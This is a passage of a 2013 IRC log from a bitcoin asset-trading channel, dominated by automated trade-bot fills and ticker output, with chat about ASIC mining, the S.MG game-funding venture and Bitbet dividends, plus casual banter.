It's about this guy who discovers time travel somehow, he's given some magic words or something by a gypsy like figure, and he's allowed to bring one person with him or something. Anyhow he gets this info as his relationship with his current girlfriend/wife is deteriorating. So he goes back into time back into the 60's or so to the university where they met to try and alter the timeline. Anyhow he does this and r Jun 04 05:16:35 wow putty :( Jun 04 05:21:28 sounds like somehting i just saw an ad for Jun 04 05:22:47 Probably Jun 04 05:24:20 [BTCTC] [TAT.ASICMINER] 5 @ 0.02479 = 0.124 BTC [+] Jun 04 05:25:55 [HAVELOCK] [ASICM] 5 @ 0.02475 = 0.1238 BTC [-] Jun 04 05:28:05 [HAVELOCK] [ASICM] 5 @ 0.02450042 = 0.1225 BTC [-] Jun 04 05:28:13 [MPEX] [S.DICE] 500 @ 0.00180011 = 0.9001 BTC [+] Jun 04 05:28:16 [MPEX] [S.DICE] 31 @ 0.0018001 = 0.0558 BTC [-] Jun 04 05:28:18 [MPEX] [S.DICE] 1500 @ 0.00180009 = 2.7001 BTC [-] Jun 04 05:28:21 [MPEX] [S.DICE] 1000 @ 0.00180008 = 1.8001 BTC [-] Jun 04 05:28:21 [MPEX] [S.DICE] 1000 @ 0.00180007 = 1.8001 BTC [-] Jun 04 05:28:33 [MPEX] [S.DICE] 15969 @ 0.00180006 = 28.7452 BTC [-] Jun 04 05:31:02 [HAVELOCK] [ASICM] 25 @ 0.0248895 = 0.6222 BTC [+] Jun 04 05:43:33 [HAVELOCK] [ASICM] 5 @ 0.02450042 = 0.1225 BTC [-] Jun 04 05:45:00 [BTCTC] [TAT.ASICMINER] 6 @ 0.02479 = 0.1487 BTC [+] Jun 04 05:49:27 [HAVELOCK] [ASICM] 72 @ 0.02450042 = 1.764 BTC [-] Jun 04 05:49:37 [HAVELOCK] [ASICM] 123 @ 0.02450042 = 3.0136 BTC [-] Jun 04 05:50:58 [BTCTC] [TAT.ASICMINER] 7 @ 0.02478 = 0.1735 BTC [-] Jun 04 05:54:28 [BTCTC] [TAT.ASICMINER] 7 @ 0.02479 = 0.1735 BTC [+] Jun 04 06:00:48 [BTCTC] [TAT.ASICMINER] 30 @ 0.02478 = 0.7434 BTC [-] Jun 04 06:02:08 [BTCTC] [TAT.ASICMINER] 7 @ 0.0245 = 0.1715 BTC [-] Jun 04 06:02:10 [BTCTC] [TAT.ASICMINER] 4 @ 0.02449 = 0.098 BTC [-] Jun 04 06:02:12 [BTCTC] [TAT.ASICMINER] 33 @ 0.02439 = 0.8049 BTC [-] Jun 04 06:02:13 [BTCTC] [TAT.ASICMINER] 5 @ 0.02438 = 0.1219 BTC [-] Jun 04 06:02:16 [BTCTC] [TAT.ASICMINER] 21 @ 0.024375 = 0.5119 BTC [-] Jun 04 06:05:32 [BTCTC] [TAT.ASICMINER] 6 @ 0.02479 = 0.1487 BTC [+] Jun 04 06:10:28 [HAVELOCK] [HIM] 4 @ 2.8 = 11.2 BTC [+] Jun 04 06:14:20 [HAVELOCK] [HIM] 5 @ 2.85 = 14.25 BTC [+] Jun 04 06:20:17 Bitbet needs more bets. I have to feed by gambling addiciton somehow. Jun 04 06:20:35 you can propose new ones Jun 04 06:20:46 and earn some btc in while Jun 04 06:21:48 [BTCTC] [BITVPS] 8 @ 0.00079 = 0.0063 BTC [-] Jun 04 06:26:11 [BTCTC] [BITVPS] 4 @ 0.000799 = 0.0032 BTC [+] Jun 04 06:47:01 [HAVELOCK] [ASICM] 8 @ 0.02489 = 0.1991 BTC [+] Jun 04 06:47:27 [HAVELOCK] [ASICM] 7 @ 0.02451 = 0.1716 BTC [-] Jun 04 06:47:48 [HAVELOCK] [HIM] 1 @ 2.9 BTC [+] Jun 04 07:00:23 ;;ticker Jun 04 07:00:35 come on Jun 04 07:00:51 Error: Failure to retrieve ticker. Try again later. Jun 04 07:00:55 ;;ticker Jun 04 07:01:23 Error: Failure to retrieve ticker. Try again later. Jun 04 07:03:34 [BTCTC] [ASICMINER-PT] 1 @ 2.49799 BTC [+] Jun 04 07:06:04 ;;bc,stats Jun 04 07:07:02 [HAVELOCK] [ASICM] 7 @ 0.02489 = 0.1742 BTC [+] Jun 04 07:10:17 Current Blocks: None | Current Difficulty: None | Next Difficulty At Block: None | Next Difficulty In: None blocks | Next Difficulty In About: None | Next Difficulty Estimate: None | Estimated Percent Change: None Jun 04 07:11:11 sounds about right Jun 04 07:12:37 [HAVELOCK] [ASICM] 10 @ 0.02489 = 0.2489 BTC [+] Jun 04 07:12:39 [HAVELOCK] [ASICM] 42 @ 0.024899 = 1.0458 BTC [+] Jun 04 07:19:25 [BTCTC] [ASICMINER-PT] 1 @ 2.466509 BTC [-] Jun 04 07:20:42 lmao what Jun 04 07:21:45 are there any working block chain scripting language games out there already? Jun 04 07:22:30 I read about it S.MG Jun 04 07:23:27 [BTCTC] [GSDPT] 4 @ 0.00316 = 0.0126 BTC [+] Jun 04 07:28:21 cole_albon what'd such a game be like ? Jun 04 07:29:04 [BTCTC] [BITVPS] 12 @ 0.000833 = 0.01 BTC [+] Jun 04 07:29:14 poker Jun 04 07:29:43 actually I was wondering the same thing. Jun 04 07:30:00 you brought it up in the prospectus Jun 04 07:30:51 [BTCTC] [BITVPS] 2 @ 0.000833 = 0.0017 BTC [+] Jun 04 07:38:14 i'm a little confused. Jun 04 07:43:46 I was reading the S.MG document. Or perhaps some article about S.MG. The author brought up the fact that S.MG would be interested in exploring the more advanced contracts functionality of bitcoin. I think that's great, just was wondering if there is anything already in the wild doing this sort of thing. Jun 04 07:44:55 well ok, but this has nothing whatsoever to do with any scripting or any blockchain Jun 04 07:45:20 I'm from missouri Jun 04 07:47:06 I'm from Florida. Jun 04 07:57:57 kakobrekla: I tried last month. Problem is there is no feedback on why a new bet is rejected. Jun 04 07:57:58 [BTCTC] [ASICMINER-PT] 1 @ 2.466202 BTC [-] Jun 04 07:58:28 neil you can always ask here. Jun 04 07:58:30 But yes I've proposed one today. Jun 04 07:58:43 that part is in the works Neil Jun 04 07:58:46 [BTCTC] [ASICMINER-PT] 1 @ 2.466201 BTC [-] Jun 04 07:58:50 Cool Jun 04 07:59:32 mircea_popescu: You didn't sleep last night? Or not in Romania? Jun 04 08:00:00 i keep strange hours. Jun 04 08:00:14 Just like Satoshi! Jun 04 08:00:16 kinda decent btc article http://www.econlib.org/library/Columns/y2013/Murphybitcoin.html Jun 04 08:00:46 yeah is mircea, me and america Jun 04 08:06:28 and off i go, later. Jun 04 08:10:17 mircea_popescu: Yeah nice article. Jun 04 08:10:34 Bitcoin article quality seems to be steadily rising. Jun 04 08:11:09 i guyess so uyeah Jun 04 08:12:23 I note with amusement that "nielsio" of youtube "Don't by bitcoins" fame has now disabled comments on all the three videos. I guess it's his way of eating humble pie... Jun 04 08:12:44 buy Jun 04 08:16:23 [BTCTC] [COGNITIVE] 1 @ 0.280213 BTC [-] Jun 04 08:17:09 [BTCTC] [COGNITIVE] 5 @ 0.280212 = 1.4011 BTC [-] Jun 04 08:17:10 hehe Jun 04 08:17:17 [BTCTC] [COGNITIVE] 2 @ 0.28021 = 0.5604 BTC [-] Jun 04 08:17:27 [BTCTC] [COGNITIVE] 2 @ 0.2801 = 0.5602 BTC [-] Jun 04 08:21:06 [BTCTC] [TAT.ASICMINER] 17 @ 0.02478 = 0.4213 BTC [-] Jun 04 08:22:02 [HAVELOCK] [ASICM] 73 @ 0.02451001 = 1.7892 BTC [-] Jun 04 08:28:34 [BTCTC] [COGNITIVE] 1 @ 0.280001 BTC [-] Jun 04 08:36:20 [BTCTC] [COGNITIVE] 2 @ 0.28 = 0.56 BTC [-] Jun 04 08:41:51 [BTCTC] [S.MPOE-PT] 3 @ 0.000671 = 0.002 BTC [-] Jun 04 08:44:49 [BTCTC] [BASIC-MINING] 1 @ 0.651303 BTC [-] Jun 04 08:52:18 [MPEX] [S.MPOE] 7500 @ 0.00072869 = 5.4652 BTC [+] Jun 04 08:54:30 [BTCTC] [TAT.ASICMINER] 5 @ 0.02478 = 0.1239 BTC [-] Jun 04 08:57:24 [BTCTC] [B.YABMC] 1 @ 0.0173 BTC [+] Jun 04 09:00:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.02478 BTC [-] Jun 04 09:00:53 [BTCTC] [TAT.ASICMINER] 20 @ 0.02478 = 0.4956 BTC [-] Jun 04 09:01:59 [BTCTC] [B.YABMC] 1 @ 0.0172 BTC [-] Jun 04 09:03:18 [BTCTC] [B.YABMC] 1 @ 0.017 BTC [-] Jun 04 09:05:23 [BTCTC] [TAT.ASICMINER] 2 @ 0.02478 = 0.0496 BTC [-] Jun 04 09:08:02 [BTCTC] [TAT.ASICMINER] 6 @ 0.02478 = 0.1487 BTC [-] Jun 04 09:11:43 [BTCTC] [BITVPS] 10 @ 0.000833 = 0.0083 BTC [+] Jun 04 09:12:07 [BTCTC] [ASICMINER-PT] 2 @ 2.475 = 4.95 BTC [+] Jun 04 09:12:09 [BTCTC] [ASICMINER-PT] 1 @ 2.47101 BTC [-] Jun 04 09:12:10 [BTCTC] [ASICMINER-PT] 6 @ 2.471 = 14.826 BTC [-] Jun 04 09:15:33 [BTCTC] [TAT.ASICMINER] 2 @ 0.02478 = 0.0496 BTC [-] Jun 04 09:16:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.02478 BTC [-] Jun 04 09:50:15 reddit users check out new subreddit /r/bitcoinstocks Jun 04 09:50:38 [BTCTC] [ASICMINER-PT] 1 @ 2.496 BTC [+] Jun 04 09:50:42 [BTCTC] [ASICMINER-PT] 1 @ 2.497 BTC [+] Jun 04 09:54:49 [HAVELOCK] [ASICM] 179 @ 0.02452 = 4.3891 BTC [+] Jun 04 09:54:50 no. Jun 04 09:54:52 ;;ticker Jun 04 09:54:53 BTCUSD ticker | Best bid: 121.66000, Best ask: 121.99999, Bid-ask spread: 0.33999, Last trade: 121.99999, 24 hour volume: 30358.08834448, 24 hour low: 115.11100, 24 hour high: 123.99000, 24 hour vwap: 119.44977 Jun 04 09:58:03 [BTCTC] [TAT.ASICMINER] 3 @ 0.02477 = 0.0743 BTC [-] Jun 04 09:59:52 [BTCTC] [BTC-BOND] 300 @ 0.01 = 3 BTC [+] Jun 04 10:02:39 [MPEX] [S.MPOE] 1200 @ 0.00072711 = 0.8725 BTC [-] Jun 04 10:21:01 [MPEX] [S.MPOE] 1650 @ 0.00072869 = 1.2023 BTC [+] Jun 04 10:21:03 [MPEX] [S.MPOE] 5000 @ 0.00072869 = 3.6435 BTC [+] Jun 04 10:25:13 [BTCTC] [TAT.ASICMINER] 11 @ 0.024413 = 0.2685 BTC [-] Jun 04 10:25:20 [BTCTC] [BASIC-MINING] 1 @ 0.651303 BTC [-] Jun 04 10:25:22 [BTCTC] [BASIC-MINING] 2 @ 0.651302 = 1.3026 BTC [-] Jun 04 10:39:48 [BTCTC] [BTC-TRADING-PT] 2 @ 0.3397 = 0.6794 BTC [-] Jun 04 10:40:25 [BTCTC] [TAT.ASICMINER] 1 @ 0.024768 BTC [+] Jun 04 10:53:58 [BTCTC] [B.YABMC] 1 @ 0.0171 BTC [+] Jun 04 10:55:08 [BTCTC] [B.YABMC] 1 @ 0.0169 BTC [-] Jun 04 10:55:57 [BTCTC] [ASICMINER-PT] 1 @ 2.473 BTC [-] Jun 04 10:56:50 [BTCTC] [TAT.ASICMINER] 5 @ 0.02444 = 0.1222 BTC [-] Jun 04 10:56:54 [BTCTC] [TAT.ASICMINER] 17 @ 0.02442 = 0.4151 BTC [-] Jun 04 10:57:11 [BTCTC] [TAT.ASICMINER] 3 @ 0.02442 = 0.0733 BTC [-] Jun 04 10:57:18 [BTCTC] [TAT.ASICMINER] 2 @ 0.02442 = 0.0488 BTC [-] Jun 04 10:57:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.024415 BTC [-] Jun 04 10:58:08 [BTCTC] [TAT.ASICMINER] 5 @ 0.024405 = 0.122 BTC [-] Jun 04 10:58:35 [BTCTC] [TAT.ASICMINER] 21 @ 0.024402 = 0.5124 BTC [-] Jun 04 11:02:56 [BTCTC] [TAT.ASICMINER] 10 @ 0.024403 = 0.244 BTC [+] Jun 04 11:03:29 [BTCTC] [TAT.ASICMINER] 2 @ 0.024402 = 0.0488 BTC [-] Jun 04 11:04:08 [BTCTC] [TAT.ASICMINER] 32 @ 0.024375 = 0.78 BTC [-] Jun 04 11:04:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.02438 BTC [+] Jun 04 11:04:40 [BTCTC] [TAT.ASICMINER] 4 @ 0.024374 = 0.0975 BTC [-] Jun 04 11:05:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.024374 BTC [-] Jun 04 11:05:49 [BTCTC] [TAT.ASICMINER] 73 @ 0.024373 = 1.7792 BTC [-] Jun 04 11:11:31 [HAVELOCK] [ASICM] 422 @ 0.02464999 = 10.4023 BTC [+] Jun 04 11:11:32 [HAVELOCK] [ASICM] 431 @ 0.02466 = 10.6285 BTC [+] Jun 04 11:18:41 [BTCTC] [TAT.ASICMINER] 8 @ 0.024766 = 0.1981 BTC [+] Jun 04 12:07:10 [BTCTC] [S.DICE-PT] 50 @ 0.0025 = 0.125 BTC [+] Jun 04 12:16:34 *hanbot* morning Jun 04 12:16:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.0245 BTC [-] Jun 04 12:27:33 [MPEX] [S.MPOE] 3671 @ 0.00072909 = 2.6765 BTC [+] Jun 04 12:27:35 [MPEX] [S.MPOE] 4950 @ 0.00073142 = 3.6205 BTC [+] Jun 04 12:27:39 [MPEX] [S.MPOE] 6300 @ 0.00073245 = 4.6144 BTC [+] Jun 04 12:39:25 [BTCTC] [TAT.ASICMINER] 1 @ 0.024761 BTC [+] Jun 04 12:45:54 [BTCTC] [B.YABMC] 1 @ 0.0171 BTC [+] Jun 04 12:46:41 [BTCTC] [TAT.ASICMINER] 10 @ 0.02476 = 0.2476 BTC [-] Jun 04 12:48:34 [BTCTC] [TAT.ASICMINER] 43 @ 0.02476 = 1.0647 BTC [-] Jun 04 12:48:35 [BTCTC] [TAT.ASICMINER] 19 @ 0.024761 = 0.4705 BTC [+] Jun 04 12:48:37 [BTCTC] [TAT.ASICMINER] 12 @ 0.024762 = 0.2971 BTC [+] Jun 04 12:48:38 [BTCTC] [TAT.ASICMINER] 60 @ 0.024763 = 1.4858 BTC [+] Jun 04 12:48:38 [BTCTC] [TAT.ASICMINER] 66 @ 0.02479 = 1.6361 BTC [+] Jun 04 12:48:45 [HAVELOCK] [ASICM] 28 @ 0.0247 = 0.6916 BTC [+] Jun 04 12:49:28 [BTCTC] [TAT.ASICMINER] 3 @ 0.02479 = 0.0744 BTC [+] Jun 04 12:49:32 [BTCTC] [TAT.ASICMINER] 174 @ 0.02485 = 4.3239 BTC [+] Jun 04 12:49:33 [BTCTC] [TAT.ASICMINER] 23 @ 0.02485 = 0.5716 BTC [+] Jun 04 12:54:08 [BTCTC] [TAT.ASICMINER] 107 @ 0.02485 = 2.659 BTC [+] Jun 04 12:59:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.02476 BTC [-] Jun 04 13:22:17 55 BTC for 15 Ghs... Can't it be traded for the ASIC rig? Jun 04 13:26:50 Trade it for an ASIC one once they get rolling with the ASICs Jun 04 13:27:11 You can put your order right now Jun 04 13:27:36 and you're supposed to have to ship your current one only when your reserved ASIC rig is already built and ready to deliver Jun 04 13:27:53 When they receive the working FPGA one, they ship right away. Jun 04 13:28:09 At least that's how it was planned back then. Not sure if that changed. Jun 04 13:45:53 [BTCTC] [ASICMINER-PT] 1 @ 2.481 BTC [+] Jun 04 13:49:56 [BTCTC] [CRYPTO-TRADE] 1 @ 0.192 BTC [+] Jun 04 13:50:01 [BTCTC] [CRYPTO-TRADE] 2 @ 0.192998 = 0.386 BTC [+] Jun 04 13:51:41 [BTCTC] [GSDPT] 26 @ 0.00316 = 0.0822 BTC [+] Jun 04 13:53:37 [BTCTC] [TAT.ASICMINER] 4 @ 0.024849 = 0.0994 BTC [+] Jun 04 13:54:10 [BTCTC] [ASICMINER-PT] 1 @ 2.481 BTC [+] Jun 04 13:54:14 [BTCTC] [ASICMINER-PT] 1 @ 2.496 BTC [+] Jun 04 13:54:17 [BTCTC] [ASICMINER-PT] 1 @ 2.496 BTC [+] Jun 04 14:06:15 [BTCTC] [TAT.ASICMINER] 8 @ 0.024849 = 0.1988 BTC [+] Jun 04 14:08:13 [BTCTC] [TAT.ASICMINER] 100 @ 0.02485 = 2.485 BTC [+] Jun 04 14:10:07 [BTCTC] [TAT.ASICMINER] 45 @ 0.02485 = 1.1183 BTC [+] Jun 04 14:20:43 [HAVELOCK] [ASICM] 42 @ 0.024541 = 1.0307 BTC [-] Jun 04 14:22:24 [HAVELOCK] [ASICM] 2 @ 0.024541 = 0.0491 BTC [-] Jun 04 14:25:38 [HAVELOCK] [ASICM] 207 @ 0.024541 = 5.08 BTC [-] Jun 04 14:29:32 yeah Chaang-Noi, not sure about that. Jun 04 14:29:50 I don't think it's really worth it without the trade-in Jun 04 14:30:05 Good morning friends. Jun 04 14:31:28 80 days for breakeven currently... without the big diff rises planned ahead... Jun 04 14:32:04 [HAVELOCK] [ASICM] 1 @ 0.02487 BTC [+] Jun 04 14:34:19 Trade it in for a rig Jun 04 14:34:25 [BTCTC] [ASICMINER-PT] 1 @ 2.49598 BTC [-] Jun 04 14:34:39 It's going to be like what, 15k extra? Jun 04 14:34:46 He's 14 years old and speaks much better than even Mark Karpeles Jun 04 14:34:49 For 100x the hashing power... Jun 04 14:34:56 Someone needs to do a parody video of Mark. Jun 04 14:35:19 wow i actually know what you mean about that Jun 04 14:35:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.0248 BTC [-] Jun 04 14:37:01 Mark Karpeles reminds me of a big baby. I just want to poke his tummy. Jun 04 14:37:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.0247 BTC [-] Jun 04 14:38:44 LMAO a striking resemblence. Jun 04 14:42:42 [07:35] Namworld but i highly down i will get the asic in less than one year Jun 04 14:42:43 [07:35] doubt Jun 04 14:43:01 But the point is, you get to keep mining with yours until it's ready. Jun 04 14:43:24 u guys know anything about kncminer Jun 04 14:43:46 i'm ready to break em off some cheddar for their warez Jun 04 14:45:05 im wondering is it even worth it to mine at any rate against asic miner, its a matter of time before they own the blockchain Jun 04 14:45:55 [BTCTC] [GSDPT] 34 @ 0.00316 = 0.1074 BTC [+] Jun 04 14:48:28 [BTCTC] [S.DICE-PT] 1 @ 0.002573 BTC [+] Jun 04 14:48:45 thats because you would make your investment back in the first week probably Jun 04 14:49:28 They already have working ASICs, they're just goddamn slow on delivering. But now that they have/can make chips, I believe all trade-ins are priority. Jun 04 14:51:27 Ask them, but trade-ins were priority back then I believe. Jun 04 14:52:27 that, combined with the discount you got on this used FPGA rig and the fact you can mine with it until the rig is ready... Jun 04 14:53:27 =P Jun 04 14:53:32 Darn it Jun 04 14:55:04 [BTCTC] [ASICMINER-PT] 8 @ 2.49 = 19.92 BTC [-] Jun 04 14:56:19 [BTCTC] [GSDPT] 144 @ 0.002901 = 0.4177 BTC [-] Jun 04 14:56:43 [BTCTC] [S.DICE-PT] 138 @ 0.002573 = 0.3551 BTC [+] Jun 04 14:56:45 [BTCTC] [S.DICE-PT] 22 @ 0.002573 = 0.0566 BTC [+] Jun 04 15:00:09 [BTCTC] [BASIC-MINING] 1 @ 0.678999 BTC [+] Jun 04 15:00:11 [BTCTC] [BASIC-MINING] 6 @ 0.679 = 4.074 BTC [+] Jun 04 15:00:12 [BTCTC] [BASIC-MINING] 5 @ 0.689 = 3.445 BTC [+] Jun 04 15:00:14 [BTCTC] [BASIC-MINING] 5 @ 0.689 = 3.445 BTC [+] Jun 04 15:08:19 [HAVELOCK] [ASICM] 1 @ 0.02487 BTC [+] **** BEGIN LOGGING AT Tue Jun 4 21:41:26 2013 Jun 04 21:43:23 no nickserv for you! Jun 04 21:43:29 come back, five minutes. Jun 04 21:43:41 use sasl Jun 04 21:43:46 no need for nickserv :p Jun 04 21:49:47 ;;bc,stats Jun 04 21:50:03 Current Blocks: 239739 | Current Difficulty: 1.2153411709775832E7 | Next Difficulty At Block: 239903 | Next Difficulty In: 164 blocks | Next Difficulty In About: 18 hours, 23 minutes, and 33 seconds | Next Difficulty Estimate: 15501125.7657 | Estimated Percent Change: 27.54547 Jun 04 21:51:23 just for the record : the global warming is so bad here Jun 04 21:51:34 i just had to turn the heater on. in june. Jun 04 21:51:47 i live in a climate where fig trees grow on the streets. Jun 04 21:51:53 or used to at any rate. Jun 04 21:52:30 13 c there? not exactly summertime I suppose Jun 04 21:53:00 look at the average temp tables. Jun 04 21:55:31 ;;later tell kakobrekla https://bitcointalk.org/index.php?topic=225405.0 Jun 04 21:55:32 The operation succeeded. **** ENDING LOGGING AT Tue Jun 4 22:01:29 2013 **** BEGIN LOGGING AT Tue Jun 4 22:03:56 2013 Jun 04 22:04:11 ;;ticker Jun 04 22:04:23 BTCUSD ticker | Best bid: 120.36552, Best ask: 120.95568, Bid-ask spread: 0.59016, Last trade: 120.95568, 24 hour volume: 24352.73949528, 24 hour low: 118.61000, 24 hour high: 123.99000, 24 hour vwap: 121.17868 Jun 04 22:10:34 seems bitbet dividends froze somewhere, too :) Jun 04 22:11:08 what, that pays dividends ?! Jun 04 22:15:56 hello Jun 04 22:17:00 hi Jun 04 22:20:04 mircea_popescu https://bitcointalk.org/index.php?topic=225405.msg2371614#msg2371614 Jun 04 22:20:08 I am kind of new, so I wanted some general pointers about btc assets, because maybe I missed something, but so far to me it seems that there are essentially only about 5 (those on mpex + asicminerPT although I couldn't get it why AM is not listed anywhere really). Am I missing something? Jun 04 22:20:30 sounds about right pixilatedbtc Jun 04 22:20:43 you have a few blue chips and a large contingent of what'd be pinksheet offerings Jun 04 22:20:52 maybe some gold burried in there, but certainly plenty of risk. Jun 04 22:21:08 I see, thanks mircea_popescu Jun 04 22:22:00 actually someone asking the right questions, too. Jun 04 22:22:02 quite refreshing. Jun 04 22:22:15 hi mircea_popescu Jun 04 22:22:17 whats new Jun 04 22:23:41 mjr_ http://trilema.com/2013/introducing-smg-the-ministry-of-games/ Jun 04 22:31:29 [HAVELOCK] [ASICM] 3 @ 0.02499999 = 0.075 BTC [+] Jun 04 22:31:30 [BTCTC] [CRYPTO-TRADE] 2 @ 0.1811 = 0.3622 BTC [-] Jun 04 22:31:31 [BTCTC] [CRYPTO-TRADE] 1 @ 0.181 BTC [-] Jun 04 22:31:32 [BTCTC] [CRYPTO-TRADE] 2 @ 0.177101 = 0.3542 BTC [-] Jun 04 22:31:33 [BTCTC] [B.YABMC] 7 @ 0.0171 = 0.1197 BTC [+] Jun 04 22:31:34 [BTCTC] [ASICMINER-PT] 2 @ 2.487 = 4.974 BTC [+] Jun 04 22:31:35 [BTCTC] [COGNITIVE] 2 @ 0.28999 = 0.58 BTC [+] Jun 04 22:31:36 [BTCTC] [LTC-MINING] 1 @ 0.320081 BTC [-] Jun 04 22:31:37 [MPEX] [S.BBET] [PAID] 1.52518548 BTC to 3`000`000 shares, 50 satoshi per share Jun 04 22:31:38 [BTCTC] [LTC-MINING] 1 @ 0.320081 BTC [-] Jun 04 22:31:39 [MPEX] [S.MPOE] 2913 @ 0.00073973 = 2.1548 BTC [+] Jun 04 22:31:39 mircea_popescu, I've read that about minigame (keep calling it mingame for some reason) and I'm not sure I got it right: do you mean you're trying to manage all btc-related games to be developed? Jun 04 22:31:56 no lol Jun 04 22:32:12 just trying to make it easier to develop for btc. Jun 04 22:32:12 [BTCTC] [ASICMINER-PT] 1 @ 2.487 BTC [+] Jun 04 22:32:37 so if a new guy comes with an idea for a btc game, how would this help him? Jun 04 22:33:47 [HAVELOCK] [ASICM] 4 @ 0.02499999 = 0.1 BTC [+] Jun 04 22:33:53 the games arent btc Jun 04 22:33:57 the funding is Jun 04 22:34:14 to quote https://bitcointalk.org/index.php?topic=224633.msg2361608#msg2361608 Jun 04 22:34:19 If you have a great idea consider I've just insulted you terribly. It'll be easier for both of us. Jun 04 22:34:22 ThickAsThieves I meant a game involving btc in some way in the play Jun 04 22:35:18 i dont think thats the plan Jun 04 22:35:23 but i cant speak for mp Jun 04 22:35:34 i think he just generally want to fund game dev projects Jun 04 22:35:47 like mmporgs and such Jun 04 22:35:58 ah, I see Jun 04 22:36:14 so it's more of a way for developers to get btc funding for game projects you mean? Jun 04 22:36:19 the way the world works it's not yet been the case that there's a group with resources and skills but so bereft of ideas that they're beating the bushes looking for someone with one. Jun 04 22:36:20 i think the first one is called Slaves & Hookers 101 Jun 04 22:36:30 the way it works is there's a sea of ideas and very little resources / even less skill. Jun 04 22:37:10 unrelatedly, can anyone explain to me why the fuck does bitbet only pay either 40-50 or else 400-500 dividends. Jun 04 22:37:11 [HAVELOCK] [ASICM] 1 @ 0.02499999 BTC [+] Jun 04 22:37:11 wtf is this. Jun 04 22:37:19 mircea_popescu ah, sorry, I cut the corners and thus got myself misunderstood: I did not mean "an idea, I have an idea, wow!" Jun 04 22:37:20 lol Jun 04 22:37:27 :p Jun 04 22:37:36 [BTCTC] [LTC-MINING] 1 @ 0.32001 BTC [-] Jun 04 22:38:21 now I understand the thing with "consider I've just insulted you terribly", lol, that's perfectly ok Jun 04 22:39:32 [BTCTC] [BASIC-MINING] 4 @ 0.69 = 2.76 BTC [+] Jun 04 22:39:38 So in this village I live in there lives a girl. She's like twenty, has fair hair, is pretty and smiles a lot. Jun 04 22:40:00 Every night she wakes up to make me various cakes. Sometimes during the day I go pick some up. Jun 04 22:40:04 It's really good, too. Jun 04 22:40:27 Yet I've never had to fuck her, or even tell her she's beautiful or anything of the sort. Jun 04 22:40:37 Isn't civilisation wonderful. Jun 04 22:41:53 so civilisation gives you cakes and deprives girls of a fuck? Jun 04 22:42:18 lol. saves me a lot of time an' effort. Jun 04 22:42:53 so this way i can... you know, spend more time here. Jun 04 22:43:44 oh no, nor more talk about pans! Jun 04 22:43:48 not* Jun 04 22:44:19 men cook on stovetops, women cook in ovens Jun 04 22:44:21 pretty simple Jun 04 22:44:44 yeah yeah Jun 04 22:44:46 you kidding ? i do plenty of stuff in the dutch oven. Jun 04 22:46:19 thats cuz youre metrosexual mp Jun 04 22:46:19 you mix it up Jun 04 22:46:19 [HAVELOCK] [ASICM] 1 @ 0.02499 BTC [-] Jun 04 22:46:19 back to minigames: as far as I know, ideas are nothing as such - it's how they are implemented (generally speaking, not talking about games only here) that makes the difference, but so again I'm not sure how is minigame going to work Jun 04 22:46:20 i dont think anyone is Jun 04 22:46:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.024879 BTC [+] Jun 04 22:46:21 i see it as an effort to raise money to put into gaming dev, and then lets see what happens Jun 04 22:46:27 [MPEX] [S.MPOE] 8502 @ 0.00074349 = 6.3212 BTC [+] Jun 04 22:46:41 ThickAsThieves: gambling, duh. Jun 04 22:47:12 just like any other business.. Jun 04 22:47:42 [BTCTC] [ASICMINER-PT] 1 @ 2.487 BTC [+] Jun 04 22:47:57 Chaang-Noi well, if I am to buy shares of something, I clearly have to trust those running the thing first Jun 04 22:48:16 it's just that I have to understand how it is supposed to work too Jun 04 22:48:44 maybe it's not how everybody does it, but I have to understand, lol Jun 04 22:49:53 hmmmm, isn't that (the silver guy/game guy thing) about believing he has a certain set of skills in addition to basic "trusting" he will essentially not run away with the money? Jun 04 22:50:34 [HAVELOCK] [ASICM] 8 @ 0.02499 = 0.1999 BTC [-] Jun 04 22:50:47 [BTCTC] [TAT.ASICMINER] 1 @ 0.02488 BTC [+] Jun 04 22:51:45 mhm, why is that? Jun 04 22:52:06 [BTCTC] [ASICMINER-PT] 1 @ 2.487 BTC [+] Jun 04 22:52:13 [HAVELOCK] [ASICM] 50 @ 0.02499 = 1.2495 BTC [-] Jun 04 22:52:36 ah, no, I meant : why Chaang-Noi> you should give mp as much as you can, Jun 04 22:52:40 [HAVELOCK] [ASICM] 30 @ 0.02499 = 0.7497 BTC [-] Jun 04 22:52:42 ahahahaha Jun 04 22:52:43 [BTCTC] [TAT.ASICMINER] 14 @ 0.02488 = 0.3483 BTC [+] Jun 04 22:52:51 sunshine is his middle name? Jun 04 22:53:11 unicorns too? Jun 04 22:53:40 :)))) Jun 04 22:53:51 [BTCTC] [TAT.ASICMINER] 14 @ 0.02488 = 0.3483 BTC [+] Jun 04 22:54:29 isn't it new though? Jun 04 22:56:39 lol, it's true that I did not really go through the logs of this chan yet, but I guess there was not much time for too much discussion on minigame yet anyway Jun 04 22:57:20 Chaang-Noi, if you don't mind me asking, what are you involved in with BTC? I saw you are quite active on the forum too, but I did not yet read too much there Jun 04 22:57:43 anyone want 175 AM options on btct - name the strike and time frame, I will give you a price Jun 04 22:58:07 [BTCTC] [TAT.ASICMINER] 4 @ 0.02488 = 0.0995 BTC [+] Jun 04 22:58:36 na, as long as I am writing covered options - does not bother me Jun 04 22:58:37 lol, a bit heavy then from what I see Jun 04 22:58:51 pixilatedbtc but are you familiar with how game (or in general entertainment) is done as a business ? Jun 04 22:59:08 [BTCTC] [ASICMINER-PT] 1 @ 2.476 BTC [-] Jun 04 23:00:20 mircea_popescu hmmmm, good point, I would not claim that, I have only a little exposure to indie dev and parts of game development (from a dev perspective, not management) + of course, playing Jun 04 23:00:20 hmmm, good point though Jun 04 23:00:49 ok, so. Jun 04 23:00:54 need to do a bit of research on that then, ok Jun 04 23:01:09 all entertainment, be it games, music, movies, whatever, uses a centralised distribution and management model. Jun 04 23:01:19 this is what mgm or paramount "are". Jun 04 23:01:32 electronic arts doesn't CREATE games. it just manages the studios that do. Jun 04 23:01:45 [BTCTC] [TAT.ASICMINER] 5 @ 0.02488 = 0.1244 BTC [+] Jun 04 23:01:57 I think I see a bit of what you mean Jun 04 23:02:31 [BTCTC] [TAT.ASICMINER] 98 @ 0.0248 = 2.4304 BTC [-] Jun 04 23:02:50 